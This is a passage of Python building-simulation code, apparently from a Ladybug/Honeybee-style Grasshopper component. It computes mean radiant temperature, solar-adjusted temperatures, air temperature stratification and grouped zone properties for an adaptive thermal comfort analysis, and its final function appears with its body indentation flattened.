    Returns a nested list (per zone, per point) of MRTs rounded to 3 decimals.
    """
    pointMRTValues = []
    lastZoneIdx = len(testPtsViewFactor) - 1
    for zoneCount, pointList in enumerate(testPtsViewFactor):
        isOutdoor = outdoorClac != False and zoneCount == lastZoneIdx
        tempDict = outSrfTempDict if isOutdoor else srfTempDict
        zoneMRTs = []
        for ptCount, pointViewFactor in enumerate(pointList):
            mrt = 0
            for srfCount, srfView in enumerate(pointViewFactor):
                # Dictionary keys are stringified [zone, surface] index pairs.
                mrt = mrt + srfView * (tempDict[str([zoneCount, srfCount])]["srfTemp"][hour])
            if isOutdoor:
                # The remaining (non-surface) view fraction sees the outdoor air.
                mrt = mrt + outdoorNonSrfViewFac[ptCount] * prevailingOutdoorTemp[originalHour]
            zoneMRTs.append(round(mrt, 3))
        pointMRTValues.append(zoneMRTs)
    return pointMRTValues
def computeHourShadeDrawing(hour, testPtSkyView, testPtBlockedVec, winShdDict, testPtBlockName, outdoorClac):
    """Re-evaluate each point's sky-vector transmissivities for this hour's shade state.

    For every unblocked sky vector, the window transmittances from winShdDict at
    `hour` are multiplied together (falling back to 1 when a lookup fails); the
    per-point sky view is then the mean of the updated vector list.
    Returns (newTestPtSkyView, newTestPtBlockedVec).
    """
    newTestPtBlockedVec = []
    newTestPtSkyView = []
    for zoneCount, zone in enumerate(testPtBlockedVec):
        zoneVecs = []
        zoneViews = []
        for ptCount, vecList in enumerate(zone):
            updatedVecs = []
            for vecCount, transmiss in enumerate(vecList):
                if transmiss == 0:
                    # Fully blocked vectors stay blocked regardless of shades.
                    updatedVecs.append(transmiss)
                else:
                    winNames = testPtBlockName[zoneCount][ptCount][vecCount]
                    transFactor = 1
                    try:
                        for window in winNames:
                            transFactor = transFactor * winShdDict[window][hour-1]
                    except: pass
                    updatedVecs.append(transFactor)
            zoneVecs.append(updatedVecs)
            zoneViews.append(sum(updatedVecs)/len(updatedVecs))
        newTestPtBlockedVec.append(zoneVecs)
        newTestPtSkyView.append(zoneViews)
    return newTestPtSkyView, newTestPtBlockedVec
def calculateSolarAdjustedMRT(pointMRTValues, stepOfSimulation, originalHour, diffSolarRad, directSolarRad, globHorizRadList, count, sunVecInfo, testPtSkyView, testPtBlockedVec, winTrans, cloA, floorR, skyPatchMeshes, zoneHasWindows, outdoorClac, lb_comfortModels):
    """Add the shortwave solar contribution to each point's long-wave MRT for one hour.

    An effective radiant field (ERF) is built from the diffuse, floor-reflected
    and direct solar radiation seen by each point and converted into an MRT
    delta (SolarCal-style approach).  Returns a nested list shaped like
    pointMRTValues with rounded, adjusted values; if there is no sun vector for
    this hour, pointMRTValues is returned unchanged.
    NOTE(review): relies on the module-level Rhino import `rc` for the sky-patch
    ray intersection.
    """
    #Pull out the correct sun vector.
    sunVec = sunVecInfo[0][count]
    altitude = sunVecInfo[1][count]
    azimuth = sunVecInfo[2][count]
    #Assign the sun vector to a sky patch that aligns with the testPtBlockedVec list.
    vectorskyPatches = []
    if sunVec != None:
        intersected = False
        ray = rc.Geometry.Ray3d(rc.Geometry.Point3d.Origin, sunVec)
        for patchCount, patch in enumerate(skyPatchMeshes):
            # MeshRay returns a negative parameter when the ray misses the patch.
            if rc.Geometry.Intersect.Intersection.MeshRay(patch, ray) >= 0:
                vectorskyPatches.append(patchCount)
                intersected = True
        if intersected == False:
            vectorskyPatches.append(None)
    else:
        vectorskyPatches.append(None)
    ##Calculate the diffuse, direct, and global horizontal components of the solar radiation at the hour.
    diffRad = diffSolarRad[originalHour-1]
    dirNormRad = directSolarRad[originalHour-1]
    globHorizRad = globHorizRadList[originalHour-1]
    #Define the Altitide and Azimuth as the SolarCal function understands it.
    # Fold azimuth into the 0-180 range and altitude into 0-90 before the
    # spline lookup below.
    azFinal = azimuth
    if azFinal > 180:
        while azFinal > 180:
            azFinal = azFinal-180
    elif azFinal < 0:
        while azFinal < 0:
            azFinal = azFinal+180
    azFinal = int(azFinal)
    altFinal = altitude
    if altFinal > 90: altFinal = altFinal-90
    altFinal = int(altFinal)
    #Compute the projected area factor and the fractional efficiency of a seated person.
    ProjAreaFac = lb_comfortModels.splineSit(azFinal, altFinal)
    fracEff = 0.696
    #Define a good guess of a radiative heat transfer coefficient.
    radTransCoeff = 6.012
    #Compute the solar adjusted temperature for each point.
    solarAdjustedPointMRTValues = []
    if sunVec != None:
        for zoneCount, zonePtsList in enumerate(pointMRTValues):
            if zoneHasWindows[zoneCount] != 0:
                solarAdjustedPointMRTValues.append([])
                for pointCount, pointMRT in enumerate(zonePtsList):
                    #Check if the sunray is blocked.
                    if vectorskyPatches[0] != None:
                        if testPtBlockedVec[zoneCount][pointCount][vectorskyPatches[0]] == 0: sunBlocked = True
                        else: sunBlocked = False
                    else: sunBlocked = True
                    #If the ray was not blocked, then adjust then get rid of direct solar radiation.
                    #Note that, while the direct radiation is multiplied by the specific window transmissivity here, the diffuse window transmissivity is already accounted for in the sky view.
                    if sunBlocked == True:
                        dirRadFinal = 0.0
                        globHorizRadFinal = diffRad
                    else:
                        dirRadFinal = dirNormRad*(testPtBlockedVec[zoneCount][pointCount][vectorskyPatches[0]])
                        globHorizRadFinal = globHorizRad
                    # Indoor points scale the ERF by the hourly window transmittance;
                    # the last zone is outdoors (no glazing) when outdoorClac is on.
                    if outdoorClac == False or zoneCount != len(pointMRTValues)-1:
                        hourERF = ((0.5*fracEff*testPtSkyView[zoneCount][pointCount]*(diffRad + (globHorizRadFinal*floorR[zoneCount][pointCount]))+ (fracEff*ProjAreaFac*dirRadFinal))*winTrans[originalHour-1])*(cloA/0.95)
                    else:
                        hourERF = ((0.5*fracEff*testPtSkyView[zoneCount][pointCount]*(diffRad + (globHorizRadFinal*floorR[zoneCount][pointCount]))+ (fracEff*ProjAreaFac*dirRadFinal)))*(cloA/0.95)
                    #Calculate the MRT delta, the solar adjusted MRT, and the solar adjusted operative temperature.
                    mrtDelt = (hourERF/(fracEff*radTransCoeff))
                    hourMRT = mrtDelt + pointMRT
                    solarAdjustedPointMRTValues[zoneCount].append(round(hourMRT, 3))
            else:
                # Zones without windows receive no solar gain; just round.
                solarAdjustedPointMRTValues.append([])
                for pointCount, pointMRT in enumerate(zonePtsList):
                    solarAdjustedPointMRTValues[zoneCount].append(round(pointMRT, 3))
    else:
        solarAdjustedPointMRTValues = pointMRTValues
    return solarAdjustedPointMRTValues
def getAirPointValue(airTempDict, testPtZoneWeights, testPtsViewFactor, hour, originalHour, outdoorClac, prevailingOutdoorTemp):
    """Blend zone air temperatures onto each test point via its per-zone weights.

    For indoor zones, each point's value is the weight-sum of airTempDict[zone]
    values at `hour`.  When outdoorClac is on, every point in the last zone of
    testPtsViewFactor simply takes the prevailing outdoor temperature at
    `originalHour`.  Returns a nested (per zone, per point) list rounded to 3
    decimals.
    """
    pointValues = []
    lastZoneIdx = len(testPtsViewFactor) - 1
    for zoneCount, pointList in enumerate(testPtsViewFactor):
        zoneVals = []
        if outdoorClac == False or zoneCount != lastZoneIdx:
            for ptWeights in testPtZoneWeights[zoneCount]:
                blended = 0
                for zoneIdx, weight in enumerate(ptWeights):
                    blended = blended + weight * (airTempDict[zoneIdx]["airTemp"][hour])
                zoneVals.append(round(blended, 3))
        else:
            outdoorVal = prevailingOutdoorTemp[originalHour]
            for _ in pointList:
                zoneVals.append(round(outdoorVal, 3))
        pointValues.append(zoneVals)
    return pointValues
def warpByHeight(pointAirTempValues, ptHeightWeights, flowVolValues, heatGainValues, adjacentList, adjacentNameList, groupedInletArea, groupedZoneHeights, groupedGlzHeights, groupedWinCeilDiffs, outdoorClac, prevailingOutdoorTemp):
    """Stratify each grouped zone's point air temperatures over height.

    Uses the zone's heat gain and ventilation flow volume to compute an
    Archimedes number per zone group, then applies either a linear
    stratification profile (Archimedes number < 59) or a two-layer profile
    (mixed lower layer below a dimensionless interface height, warm upper
    layer above it).  pointAirTempValues is modified in place per point using
    ptHeightWeights (the point's 0-1 normalized height in the zone) and also
    returned.  The last zone is skipped when outdoorClac is on.
    NOTE(review): the constants 1.2 and 1012 appear to be air density (kg/m3)
    and specific heat (J/kg-K), and 9.806*0.0034 a buoyancy term — confirm
    against the source of the stratification correlations.
    """
    #Get a list of total heat gain for each of the grouped zones.
    #Get a list of total flow volume for each of the grouped zones.
    groupedHeatGains = []
    groupedFlowVol = []
    for zoneList in adjacentList:
        zoneHeatG = 0
        zoneFlowV = 0
        for val in zoneList:
            zoneHeatG += heatGainValues[val]
            zoneFlowV += flowVolValues[val]
        groupedHeatGains.append(zoneHeatG)
        groupedFlowVol.append(zoneFlowV)
    #Calculate the Archimedes numbers and the temperature change of the grouped zones.
    tempChanges = []
    archimedesNumbers = []
    archiNumWinScale = []
    for zoneCount in range(len(adjacentList)):
        if groupedHeatGains[zoneCount] > 0.0:
            # The try/except guards against zero flow volume or inlet area
            # (division by zero) — such zones fall back to "no stratification".
            try:
                tempChange = (groupedHeatGains[zoneCount])/(1.2*1012*groupedFlowVol[zoneCount])
                tempChanges.append(tempChange)
                archiNumberNum = (9.806*0.0034*groupedHeatGains[zoneCount])*(groupedWinCeilDiffs[zoneCount]*groupedWinCeilDiffs[zoneCount]*groupedWinCeilDiffs[zoneCount])
                archiNumberDenom = (1.2*1012*groupedFlowVol[zoneCount]*groupedFlowVol[zoneCount]*(groupedFlowVol[zoneCount]/groupedInletArea[zoneCount]))
                archiNumber = archiNumberNum/archiNumberDenom
                archimedesNumbers.append(archiNumber)
                archiNumWinScaleNum = (9.806*0.0034*groupedHeatGains[zoneCount])*(groupedGlzHeights[zoneCount]*groupedGlzHeights[zoneCount]*groupedGlzHeights[zoneCount])
                archiNumWinScale.append(archiNumWinScaleNum/archiNumberDenom)
            except:
                tempChanges.append(0)
                archimedesNumbers.append(0)
                archiNumWinScale.append(0)
        else:
            # No heat gain: no buoyancy-driven stratification.
            tempChanges.append(0)
            archimedesNumbers.append(0)
            archiNumWinScale.append(0)
    #Calculate the dimensionless temperature change over the room.
    dimTempDeltas = []
    dimInterfHeights = []
    cielTemps = []
    for zoneCount in range(len(adjacentList)):
        if archimedesNumbers[zoneCount] < 59 and archimedesNumbers[zoneCount] != 0:
            #Linear stratification profile.
            dimInterfHeights.append(0)
            dimensionlessTempDelta = 0.58 - (0.14 * math.log10(archiNumWinScale[zoneCount]))
            dimTempDeltas.append(dimensionlessTempDelta)
            cielTemps.append((dimensionlessTempDelta/2)*tempChanges[zoneCount])
        elif archimedesNumbers[zoneCount] != 0:
            #Two-Layer stratification profile.
            dimensionlessInterfHeight = 0.92 - (0.18 * math.log10(archimedesNumbers[zoneCount]))
            dimInterfHeights.append(dimensionlessInterfHeight)
            # log10 raises on a non-positive window-scaled Archimedes number.
            try: dimensionlessTempDelta = 0.58 - (0.14 * math.log10(archiNumWinScale[zoneCount]))
            except: dimensionlessTempDelta = 0
            if dimensionlessTempDelta > 0:
                dimTempDeltas.append(dimensionlessTempDelta)
                cielTemps.append(((dimensionlessTempDelta*dimensionlessInterfHeight)/2)*tempChanges[zoneCount])
            else:
                dimTempDeltas.append(0)
                cielTemps.append(0)
                dimInterfHeights.append(0)
        else:
            dimTempDeltas.append(0)
            cielTemps.append(0)
            dimInterfHeights.append(0)
    #Calculate the dimensionless temperature at the dimensionless height and convert to final temperature.
    for zoneCount, zone in enumerate(pointAirTempValues):
        if len(zone) != 0:
            if outdoorClac == False or zoneCount != len(pointAirTempValues)-1:
                if archimedesNumbers[zoneCount] < 59 and dimTempDeltas[zoneCount] != 0:
                    #Linear stratification profile.
                    cielTemp = cielTemps[zoneCount]
                    dimTempDelta = dimTempDeltas[zoneCount]
                    for ptCount, ptValue in enumerate(zone):
                        ptTemp = ptValue + cielTemp - dimTempDelta*tempChanges[zoneCount]*(1-ptHeightWeights[zoneCount][ptCount])
                        pointAirTempValues[zoneCount][ptCount] = round(ptTemp, 3)
                elif dimTempDeltas[zoneCount] != 0:
                    #Two-Layer stratification profile.
                    cielTemp = cielTemps[zoneCount]
                    dimTempDelta = dimTempDeltas[zoneCount]
                    dimInterHeight = dimInterfHeights[zoneCount]
                    for ptCount, ptValue in enumerate(zone):
                        if ptHeightWeights[zoneCount][ptCount] < dimInterHeight:
                            # Below the interface: temperature ramps up to the ceiling value.
                            ptTemp = ptValue + cielTemp - dimTempDelta*tempChanges[zoneCount]*(dimInterHeight - ptHeightWeights[zoneCount][ptCount])
                        else:
                            # Above the interface: uniform warm upper layer.
                            ptTemp = ptValue + cielTemp
                        pointAirTempValues[zoneCount][ptCount] = round(ptTemp, 3)
                else: pass
            else: pass
        else:
            pass
    return pointAirTempValues
def createShdDict(shdHeaders, shdNumbers, zoneWindowTransmiss, zoneWindowNames):
    """Map each window name (upper-cased) to its hourly transmittance list.

    Windows present in shdHeaders get their dynamic (shaded) hourly values from
    shdNumbers; all remaining windows get their static transmittance repeated
    to the same list length.
    """
    shdDict = {}
    calcLen = 1
    #Add any windows with changing transmittance to the list.
    for headerCt, header in enumerate(shdHeaders):
        # Header text looks like "... for WINDOWNAME:...".
        windowName = header[2].split(" for ")[-1].split(":")[0].upper()
        shdDict[windowName] = shdNumbers[headerCt]
        calcLen = len(shdNumbers[headerCt])
    #Add any windows with static transmittance to the list.
    for zC, zone in enumerate(zoneWindowNames):
        for winCt, win in enumerate(zone):
            winKey = win.upper()
            if winKey not in shdDict:
                shdDict[winKey] = duplicateData([zoneWindowTransmiss[zC][winCt]], calcLen)
    return shdDict
def createSrfDict(zoneSrfNames, nameKey, datakey, srfHeaders, srfNumbers):
    """Build a dict keyed by stringified [zone, surface] index pairs.

    Each entry holds the surface's name (under nameKey) and, when a matching
    data stream is found in srfHeaders, its hourly values (under datakey).
    Matching is by exact upper-cased name first, with two fuzzy fallbacks for
    glazing ("GLZ") surfaces whose EnergyPlus names are sub- or super-strings
    of the model names.  Surfaces with no match are reported via print.
    """
    srfDict = {}
    for i in range(len(zoneSrfNames)):
        for srfindex in range(len(zoneSrfNames[i])):
            pathInt = [i,srfindex]
            path = str(pathInt)
            if not srfDict.has_key(path):
                srfDict[path] = {}
            srfDict[path][nameKey] = zoneSrfNames[pathInt[0]][pathInt[1]]
    #Figure out which surfaces in the dictionary correspond to the connected srfHeaders.
    for listCount, list in enumerate(srfHeaders):
        # Header text looks like "... for SURFACENAME[:...]".
        srfName = list[2].split(" for ")[-1]
        try: srfName = srfName.split(":")[0]
        except: pass
        foundIt = False
        for path in srfDict:
            if srfDict[path][nameKey].upper() == srfName:
                srfDict[path][datakey] = srfNumbers[listCount]
                foundIt = True
            elif srfDict[path][nameKey].upper() in srfName and "GLZ" in srfDict[path][nameKey].upper():
                # Fallback: the model's glazing name is contained in the EP name.
                srfDict[path][datakey] = srfNumbers[listCount]
                foundIt = True
            elif srfName.split('_')[0] in srfDict[path][nameKey].upper() and "GLZ" in srfDict[path][nameKey].upper():
                # Fallback: the EP name's prefix is contained in the model's glazing name.
                try:
                    srfDict[path][datakey] = srfNumbers[listCount]
                    foundIt = True
                except: pass
        if foundIt == False:
            print "Surface temperature for Surface: " + srfName + " not found in the EP results."
    return srfDict
def createZoneDict(testPtZoneNames, nameKey, datakey, zoneHeaders, zoneNumbers):
    """Build a dict keyed by zone index with each zone's name and matched hourly data.

    Every zone gets its name stored under nameKey; a data stream from
    zoneHeaders/zoneNumbers is attached under datakey when the upper-cased zone
    name equals the name parsed from the stream's header.
    """
    zoneDict = {}
    for zoneIdx in range(len(testPtZoneNames)):
        zoneDict.setdefault(zoneIdx, {})[nameKey] = testPtZoneNames[zoneIdx]
    #Figure out which zones in the dictionary correspond to the connected dataHeaders.
    for listCount, header in enumerate(zoneHeaders):
        # Header text looks like "... for ZONENAME".
        zName = header[2].split(" for ")[-1]
        for path in zoneDict:
            if zoneDict[path][nameKey].upper() == zName:
                zoneDict[path][datakey] = zoneNumbers[listCount]
    return zoneDict
def computeGroupedRoomProperties(testPtZoneWeights, testPtZoneNames, zoneInletInfo, inletHeightOverride):
    """Group air-connected zones and derive the geometry used by the stratification model.

    Zones are grouped by which zones share non-zero weights on the same test
    points (i.e. exchange air).  For each group this computes total volume,
    inlet (window) area, overall height, area-weighted glazing height and the
    window-to-ceiling distance, optionally overridden per group by
    inletHeightOverride.
    Returns (adjacentList, adjacentNameList, groupedInletArea,
    groupedZoneHeights, groupedGlzHeights, groupedWinCeilDiffs, groupedTotalVol).
    NOTE(review): zoneInletInfo rows appear to be
    [minHeight, maxHeight, glzHeight, ..., volume, inletArea] — confirm with caller.
    """
    #Figure out which zones are connected from the testPtZoneWeights.
    adjacentList = []
    adjacentNameList = []
    for falseZone in testPtZoneWeights:
        for pt in falseZone:
            ptAdjList = []
            ptNameList = []
            for zoneCount, zone in enumerate(pt):
                if zone != 0:
                    ptAdjList.append(zoneCount)
                    ptNameList.append(testPtZoneNames[zoneCount])
            if ptAdjList not in adjacentList: adjacentList.append(ptAdjList)
            if ptNameList not in adjacentNameList: adjacentNameList.append(ptNameList)
    # Pad with empty groups so the list stays index-aligned with the zones.
    if len(adjacentList) != len(testPtZoneWeights):
        for zonecount, zoneList in enumerate(testPtZoneWeights):
            if zoneList == []:
                adjacentList.insert(zonecount, [])
                adjacentNameList.insert(zonecount, [])
    #Compute the grouped window heights and zone heights for the stratification calculation
    groupedTotalVol = []
    groupedTotalVolList = []
    groupedInletArea = []
    groupedInletAreaList = []
    groupedMinHeightsInit = []
    groupedMaxHeightsInit = []
    groupedGlzHeightsInit = []
    for zoneList in adjacentList:
        zoneTotV = 0
        inletA = 0
        inletAList = []
        minHeightList = []
        maxHeightList = []
        glzHeightList = []
        volList = []
        for val in zoneList:
            zoneTotV += zoneInletInfo[val][-2]
            volList.append(zoneInletInfo[val][-2])
            inletA += zoneInletInfo[val][-1]
            inletAList.append(zoneInletInfo[val][-1])
            minHeightList.append(zoneInletInfo[val][0])
            maxHeightList.append(zoneInletInfo[val][1])
            glzHeightList.append(zoneInletInfo[val][2])
        # Windowless groups fall back to an inlet area proportional to volume.
        if inletA != 0: groupedInletArea.append(inletA)
        else: groupedInletArea.append(0.0025*zoneTotV)
        groupedInletAreaList.append(inletAList)
        groupedMinHeightsInit.append(minHeightList)
        groupedMaxHeightsInit.append(maxHeightList)
        groupedGlzHeightsInit.append(glzHeightList)
        groupedTotalVol.append(zoneTotV)
        groupedTotalVolList.append(volList)
    #Figure out what the height of the grouped zones should be and what the average height of the windows is.
    groupedZoneHeights = []
    groupedGlzHeights = []
    groupedWinCeilDiffs = []
    for zoneCount in range(len(adjacentList)):
        if len(groupedMinHeightsInit[zoneCount]) != 0:
            if len(groupedMinHeightsInit[zoneCount]) != 1:
                # Multi-zone group: span from the lowest floor to the highest ceiling.
                groupedMinHeightsInit[zoneCount].sort()
                minHeight = groupedMinHeightsInit[zoneCount][0]
                groupedMaxHeightsInit[zoneCount].sort()
                maxHeight = groupedMaxHeightsInit[zoneCount][-1]
                roomHeight = maxHeight - minHeight
                groupedZoneHeights.append(roomHeight)
                if inletHeightOverride == []:
                    # Weight each zone's glazing height by its share of inlet
                    # area (or of volume when the group has no inlet area).
                    areaWeights = []
                    for areaCount, area in enumerate(groupedInletAreaList[zoneCount]):
                        try:
                            areaWeights.append(area/sum(groupedInletAreaList[zoneCount]))
                        except:
                            areaWeights.append(groupedTotalVolList[zoneCount][areaCount]/groupedTotalVol[zoneCount])
                    weightedGlzHeights = []
                    for count, height in enumerate(groupedGlzHeightsInit[zoneCount]):
                        try:
                            weightedHeight = (height)*areaWeights[count]
                            weightedGlzHeights.append(weightedHeight)
                        except:
                            weightedGlzHeights.append(0)
                    weightedAvgGlzHeight = sum(weightedGlzHeights)
                    if weightedAvgGlzHeight == 0:
                        #If the glazing height is 0, this means that the grouped zones have no windows so take the average height of the zone.
                        weightedAvgGlzHeight = roomHeight*0.5
                    groupedGlzHeights.append(weightedAvgGlzHeight - minHeight)
                    groupedWinCeilDiffs.append(maxHeight - weightedAvgGlzHeight)
                else:
                    groupedGlzHeights.append(inletHeightOverride[zoneCount] - minHeight)
                    groupedWinCeilDiffs.append(maxHeight - inletHeightOverride[zoneCount])
            else:
                # Single-zone group.
                roomHeight = groupedMaxHeightsInit[zoneCount][0] - groupedMinHeightsInit[zoneCount][0]
                groupedZoneHeights.append(roomHeight)
                if inletHeightOverride == []:
                    if groupedGlzHeightsInit[zoneCount][0] != None:
                        glzHeight = groupedGlzHeightsInit[zoneCount][0]
                    else: glzHeight = (groupedMaxHeightsInit[zoneCount][0] - groupedMinHeightsInit[zoneCount][0])/2
                    groupedGlzHeights.append(glzHeight - groupedMinHeightsInit[zoneCount][0])
                    groupedWinCeilDiffs.append(groupedMaxHeightsInit[zoneCount][0] - glzHeight)
                else:
                    groupedGlzHeights.append(inletHeightOverride[zoneCount] - groupedMinHeightsInit[zoneCount][0])
                    groupedWinCeilDiffs.append(groupedMaxHeightsInit[zoneCount][0] - inletHeightOverride[zoneCount])
        else:
            # Empty placeholder group.
            groupedZoneHeights.append(0)
            groupedGlzHeights.append(0)
            groupedWinCeilDiffs.append(0)
    return adjacentList, adjacentNameList, groupedInletArea, groupedZoneHeights, groupedGlzHeights, groupedWinCeilDiffs, groupedTotalVol
def mainAdapt(HOYs, analysisPeriod, srfTempNumbers, srfTempHeaders, airTempDataNumbers, airTempDataHeaders, flowVolDataHeaders, flowVolDataNumbers, heatGainDataHeaders, heatGainDataNumbers, zoneSrfNames, testPtsViewFactor, viewFactorMesh, latitude, longitude, timeZone, diffSolarRad, directSolarRad, globHorizRad, testPtSkyView, testPtBlockedVec, numSkyPatchDivs, winTrans, cloA, floorR, testPtZoneNames, testPtZoneWeights, ptHeightWeights, zoneInletInfo, inletHeightOverride, prevailingOutdoorTemp, ASHRAEorEN, comfClass, avgMonthOrRunMean, levelOfConditioning, mixedAirOverride, zoneHasWindows, outdoorClac, outSrfTempHeaders, outSrfTempNumbers, outdoorNonSrfViewFac, dataAnalysisPeriod, outWindSpeed, d, a, outdoorPtHeightWeights, allWindowShadesSame, winStatusHeaders, testPtBlockName, zoneWindowTransmiss, zoneWindowNames, allWindSpeedsSame, winSpeedNumbers, northAngle, lb_preparation, lb_sunpath, lb_comfortModels, lb_wind):
#Set up matrices to be filled.
radTempMtx = ['Radiant Temperature;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
airTempMtx = ['Air Temperature;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
operativeTempMtx = ['Operative Temperature;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
adaptComfMtx = ['Adaptive Thermal Comfort Percent;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
degFromTargetMtx = ['Degrees From Target;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
#Check the data anlysis period and subtract the start day from each of the HOYs.
originalHOYs = []
if dataAnalysisPeriod != [(1,1,1),(12,31,24)]:
FinalHOYs, mon, days = lb_preparation.getHOYsBasedOnPeriod(dataAnalysisPeriod, 1)
for hCount, hour in enumerate(HOYs):
originalHOYs.append(hour)
HOYs[hCount] = hour - FinalHOYs[0]
else: originalHOYs = HOYs
#Check to be sure that the requested analysis period and the analysis period of the connected data align.
periodsAlign = True
for hour in HOYs:
if hour < 0: periodsAlign = False
try: srfTempNumbers[0][hour-1]
except: periodsAlign = False
if periodsAlign == False:
warning = 'The analysis period of the energy simulation data and the analysisPeriodOrHOY_ plugged into this component do not align.'
print warning
ghenv.Component.AddRuntimeMessage(w, warning)
return -1
else:
#Create placeholders for all of the hours.
months = []
dayNums = []
for hour in HOYs:
radTempMtx.append(0)
airTempMtx.append(0)
operativeTempMtx.append(0)
adaptComfMtx.append(0)
degFromTargetMtx.append(0)
d, m, t = lb_preparation.hour2Date(hour, True)
if m not in months: months.append(m)
if avgMonthOrRunMean == False:
day = int(lb_preparation.getJD(m, d))
if day not in dayNums: dayNums.append(day)
#Get the prevailing outdoor temperature for the whole analysis.
prevailTemp, coldTimes = processPrevailOutdoorTemp(prevailingOutdoorTemp, avgMonthOrRunMean)
#Check to see if there are any times when the prevailing temperature is too cold and give a comment that we are using a non-standard model.
monthNames = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
if ASHRAEorEN == True: modelName = "ASHRAE 55"
else: modelName = "EN-15251"
if coldTimes != []:
if avgMonthOrRunMean == True:
coldMsg = "The following months were too cold for the official " + modelName + " standard and have used a correlation from recent research:"
for month in months:
if month in coldTimes:
coldMsg += '\n'
coldMsg += monthNames[month]
print coldMsg
ghenv.Component.AddRuntimeMessage(gh.GH_RuntimeMessageLevel.Remark, coldMsg)
else:
totalColdInPeriod = []
for day in dayNums:
if day in coldTimes: totalColdInPeriod.append(day)
if totalColdInPeriod != []:
coldMsg = "There were " + str(len(totalColdInPeriod)) + " days of the analysis period when the outdoor temperatures were too cold for the official " + modelName + "standard. \n A correlation from recent research has been used in these cases."
print coldMsg
ghenv.Component.AddRuntimeMessage(gh.GH_RuntimeMessageLevel.Remark, coldMsg)
#Make sure that the EPW Data does not include headers.
prevailingOutdoorTemp = prevailingOutdoorTemp[7:]
outWindSpeed = outWindSpeed[7:]
#Make a dictionary that will relate the zoneSrfNames to the srfTempValues.
srfTempDict = createSrfDict(zoneSrfNames, "srfName", "srfTemp", srfTempHeaders, srfTempNumbers)
#Make a dictionary for outdoor srfNames and temperatures.
if outdoorClac == True:
outSrfTempDict = createSrfDict(zoneSrfNames, "srfName", "srfTemp", outSrfTempHeaders, outSrfTempNumbers)
else: outSrfTempDict = {}
#If there are different hourly window transmissivities for different windows, make a dictionary for the shades and make a neutral winTrans list to cancel out the usual way window transmissivity is factored in.
neutralWinTransList = []
winShdDict = {}
if allWindowShadesSame == False:
for hr in range(8760): neutralWinTransList.append(1)
winShdDict = createShdDict(winStatusHeaders, winTrans, zoneWindowTransmiss, zoneWindowNames)
#Make sure that there are windows in the model and, if so, generate solar outputs.
if sum(zoneHasWindows) != 0:
#Create a meshed sky dome to assist with direct sunlight falling on occupants.
skyPatches = lb_preparation.generateSkyGeo(rc.Geometry.Point3d.Origin, numSkyPatchDivs, .5)
skyPatchMeshes = []
for patch in skyPatches:
skyPatchMeshes.append(rc.Geometry.Mesh.CreateFromBrep(patch, rc.Geometry.MeshingParameters.Coarse)[0])
#Initiate the sun vector calculator.
lb_sunpath.initTheClass(float(latitude), northAngle, rc.Geometry.Point3d.Origin, 100, float(longitude), float(timeZone))
#Calculate the altitude and azimuth of the different hours.
sunVecs = []
altitudes = []
azimuths = []
for hour in originalHOYs:
d, m, t = lb_preparation.hour2Date(hour, True)
lb_sunpath.solInitOutput(m+1, d, t)
altitude = math.degrees(lb_sunpath.solAlt)
azimuth = math.degrees(lb_sunpath.solAz)
if altitude > 0:
sunVec = lb_sunpath.sunReverseVectorCalc()
else: sunVec = None
sunVecs.append(sunVec)
altitudes.append(altitude)
azimuths.append(azimuth)
sunVecInfo = [sunVecs, altitudes, azimuths]
#Make a dictionary that will relate the testPtZoneNames to the air temperatures.
airTempDict = createZoneDict(testPtZoneNames, "zoneName", "airTemp", airTempDataHeaders, airTempDataNumbers)
#Compute grouped zone properties for air stratification purposes.
adjacentList, adjacentNameList, groupedInletArea, groupedZoneHeights, groupedGlzHeights, groupedWinCeilDiffs, groupedZoneVols = computeGroupedRoomProperties(testPtZoneWeights, testPtZoneNames, zoneInletInfo, inletHeightOverride)
#Compute a generalizable "projected area" to estimate the zone's starting wind speed.
#Note that this projection should ideally be done perpendicularly to the direction of air flow but, since we don't really know the direction of air flow in the zone, we will compute it generally over the whole volume.
projectedAreas = []
for zoneVol in groupedZoneVols:
projLen = math.pow(zoneVol, 1/3)
projArea = projLen*projLen
projectedAreas.append(projArea)
#Run through every hour of the analysis to fill up the matrices.
calcCancelled = False
try:
def climateMap(count):
#Ability to cancel with Esc
if gh.GH_Document.IsEscapeKeyDown(): assert False
# Get the hour.
hour = HOYs[count]
originalHour = originalHOYs[count]
#Select out the relevant flow vol and heat gain values.
flowVolValues = []
heatGainValues = []
for zoneVal in flowVolDataNumbers: flowVolValues.append(zoneVal[hour-1])
for zoneVal in heatGainDataNumbers: heatGainValues.append(zoneVal[hour-1])
#Compute the radiant temperature.
pointMRTValues = calculatePointMRT(srfTempDict, testPtsViewFactor, hour-1, originalHour-1, outdoorClac, outSrfTempDict, outdoorNonSrfViewFac, prevailingOutdoorTemp)
if sum(zoneHasWindows) != 0:
if allWindowShadesSame == True: pointMRTValues = calculateSolarAdjustedMRT(pointMRTValues, hour, originalHour, diffSolarRad, directSolarRad, globHorizRad, count, sunVecInfo, testPtSkyView, testPtBlockedVec, winTrans, cloA, floorR, skyPatchMeshes, zoneHasWindows, outdoorClac, lb_comfortModels)
else:
#To factor in the effect of blocked sunlight, I have to re-make the testPtSkyView and the testPtBlockedVec to reflect the conditions for the given hour.
hourTestPtSkyView, hourTestPtBlockedVec = computeHourShadeDrawing(hour, testPtSkyView, testPtBlockedVec, winShdDict, testPtBlockName, outdoorClac)
pointMRTValues = calculateSolarAdjustedMRT(pointMRTValues, hour, originalHour, diffSolarRad, directSolarRad, globHorizRad, count, sunVecInfo, hourTestPtSkyView, hourTestPtBlockedVec, neutralWinTransList, cloA, floorR, skyPatchMeshes, zoneHasWindows, outdoorClac, lb_comfortModels)
pointMRTValues = lb_preparation.flattenList(pointMRTValues)
radTempMtx[count+1] = pointMRTValues
#Compute the air temperature.
pointAirTempValues = getAirPointValue(airTempDict, testPtZoneWeights, testPtsViewFactor, hour-1, originalHour-1, outdoorClac, prevailingOutdoorTemp)
